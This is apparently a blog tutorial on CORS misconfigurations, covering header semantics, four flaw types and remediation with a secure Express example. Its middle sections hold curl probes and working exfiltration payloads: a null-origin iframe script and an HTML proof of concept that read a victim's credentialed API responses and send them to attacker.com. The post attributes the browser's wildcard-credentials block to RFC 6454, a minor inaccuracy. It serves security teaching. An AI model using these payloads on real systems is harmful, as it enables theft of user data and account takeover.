Blog

How to Exploit CORS Misconfigurations in Modern Web Apps

Cross-Origin Resource Sharing (CORS) misconfigurations rank among the most critical web security vulnerabilities, enabling attackers to bypass the Same-Origin Policy (SOP) and exfiltrate sensitive user data. This comprehensive guide covers exploitation techniques, detection methods, and real-world attack scenarios.

Thank you for reading this post, don't forget to subscribe!

CORS Security Architecture
CORS architecture showing cross-origin request flow

Understanding CORS Architecture

Technically, CORS is a browser-enforced security mechanism that uses HTTP headers to control cross-origin requests. When a browser initiates a cross-origin request, it sends an Origin header, and the server responds with specific CORS headers:

  • Access-Control-Allow-Origin — Specifies which origins can access the resource
  • Access-Control-Allow-Credentials — Indicates whether cookies/authorization headers can be included
  • Access-Control-Allow-Methods — Lists permitted HTTP methods
  • Access-Control-Allow-Headers — Specifies allowed request headers
  • Access-Control-Max-Age — Defines preflight cache duration

Critical CORS Misconfigurations

1. Access-Control-Allow-Origin: * with Credentials

The wildcard origin combined with Access-Control-Allow-Credentials: true creates a severe vulnerability. While browsers reject this combination per RFC 6454, misconfigured servers may still expose sensitive endpoints.

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
// Browser blocks this, but legacy systems may not

2. Origin Reflection Vulnerability

When servers dynamically copy the Origin header value into Access-Control-Allow-Origin without validation, attackers can exploit this from any domain:

GET /api/user/profile HTTP/1.1
Host: vulnerable-app.com
Origin: https://attacker.com
Cookie: session=abc123

// Server Response:
HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://attacker.com
Access-Control-Allow-Credentials: true
// Now attacker.com can read this response!

3. Null Origin Trust

The null origin appears in sandboxed iframes, data URLs, and local HTML files. Servers trusting null origins effectively trust any attacker-controlled context:

<iframe sandbox="allow-scripts" src="data:text/html,
<script>
  fetch('https://vulnerable-app.com/api/sensitive', {
    credentials: 'include'
  }).then(r => r.text()).then(data => {
    // Exfiltrate to attacker server
    fetch('https://attacker.com/steal?data=' + encodeURIComponent(data));
  });
</script>"></iframe>

4. Subdomain Wildcard Trust

Regex patterns like *.example.com that trust all subdomains are dangerous if any subdomain has XSS vulnerabilities or is attacker-controlled:

// Vulnerable server logic:
if (origin.endsWith('.example.com')) {
  response.setHeader('Access-Control-Allow-Origin', origin);
  response.setHeader('Access-Control-Allow-Credentials', 'true');
}

// Attack: If attacker controls xss.example.com
// They can make authenticated requests from their subdomain

Exploitation Techniques

Manual Detection with curl

Cybersecurity Attack Vectors
CORS misconfiguration exploitation techniques
# Test origin reflection
curl -H "Origin: https://evil.com"      -H "Cookie: session=valid"      -i https://target.com/api/user

# Check for null origin trust
curl -H "Origin: null"      -i https://target.com/api/data

# Test subdomain trust
curl -H "Origin: https://xss.target.com"      -i https://target.com/api/sensitive

Automated Scanning with CORSscan

python cors_scan.py -u https://target.com -d comma,separated,origins

# Example output:
[+] Vulnerable to origin reflection
[+] Null origin trusted
[+] Credentials allowed with reflected origin
[!] High severity: Can steal user data

Proof of Concept Exploit

<!DOCTYPE html>
<html>
<head>
    <title>CORS Exploit PoC</title>
</head>
<body>
    <h1>CORS Data Exfiltration</h1>
    <script>
        // Target vulnerable endpoint
        var targetUrl = 'https://vulnerable-app.com/api/user/data';
        
        fetch(targetUrl, {
            method: 'GET',
            credentials: 'include', // Include cookies
            headers: {
                'Content-Type': 'application/json'
            }
        })
        .then(response => response.json())
        .then(data => {
            console.log('Stolen data:', data);
            
            // Exfiltrate to attacker server
            fetch('https://attacker.com/collect', {
                method: 'POST',
                body: JSON.stringify({
                    victim: data,
                    timestamp: Date.now()
                })
            });
        })
        .catch(error => console.error('Error:', error));
    </script>
</body>
</html>

Advanced Attack Scenarios

Scenario 1: API Key Theft

Modern web applications expose REST APIs with sensitive keys. CORS misconfigurations allow attackers to steal API responses containing personal data, authentication tokens, and business logic responses.

Scenario 2: Account Takeover

If password reset endpoints have CORS misconfigurations, attackers can initiate and complete password resets by reading the reset token from API responses, leading to full account compromise.

Scenario 3: CSRF Token Bypass

CORS vulnerabilities can bypass CSRF protections by allowing attackers to read CSRF tokens from authenticated responses and include them in malicious requests.

Remediation Best Practices

  • Whitelist Validation — Only allow specific, trusted origins from a maintained whitelist
  • Avoid Credentials with Wildcards — Never combine Access-Control-Allow-Origin: * with credentials
  • Strict Subdomain Validation — Validate exact subdomain matches, not regex patterns
  • Reject Null Origins — Never trust the null origin in production environments
  • Use Vary Header — Include Vary: Origin to prevent caching issues
  • Implement CSP — Use Content Security Policy as defense-in-depth
// Secure CORS implementation (Node.js/Express)
const allowedOrigins = [
  'https://example.com',
  'https://app.example.com'
];

app.use((req, res, next) => {
  const origin = req.headers.origin;
  
  if (allowedOrigins.includes(origin)) {
    res.setHeader('Access-Control-Allow-Origin', origin);
    res.setHeader('Access-Control-Allow-Credentials', 'true');
    res.setHeader('Access-Control-Allow-Methods', 'GET,POST,PUT,DELETE');
    res.setHeader('Access-Control-Allow-Headers', 'Content-Type,Authorization');
    res.setHeader('Vary', 'Origin');
  }
  
  next();
});

Detection and Monitoring

Implement continuous monitoring for CORS misconfigurations using automated scanners integrated into CI/CD pipelines. Monitor server logs for suspicious Origin headers and implement alerts for unusual cross-origin request patterns.

Conclusion

Security Hardening
CORS security checklist and best practices

CORS misconfigurations represent a critical class of web vulnerabilities that can lead to complete user data compromise. Regular security audits, automated testing, and adherence to strict origin validation policies are essential for maintaining robust web application security.

Related Resources: